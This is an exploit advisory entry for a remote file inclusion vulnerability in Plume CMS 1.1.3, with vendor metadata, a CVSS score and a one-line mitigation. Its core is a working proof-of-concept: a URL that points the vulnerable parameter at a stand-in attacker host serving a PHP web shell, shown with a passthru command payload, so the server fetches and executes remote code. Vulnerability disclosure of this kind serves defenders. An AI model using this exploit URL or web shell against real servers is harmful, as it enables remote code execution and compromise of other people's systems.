vendor:
Plume CMS
by:
Hamid Ebadi
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Plume CMS
Affected Version From: Plume CMS 1.1.3
Affected Version To: Plume CMS 1.1.3
Patch Exists: NO
Related CWE: N/A
CPE: plume-cms
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006
Plume CMS Remote File Inclusion
The following URL will cause the server to include external files http://localhost/plume-1.1.3/manager/tools/link/dbinstall.php?cmd=ls -al&_PX_config[manager_path]=http://attacker/cmd.gif? cmd.gif <? passthru($_GET['cmd']); ?>
Mitigation:
Edit the source code to ensure that input is properly verified.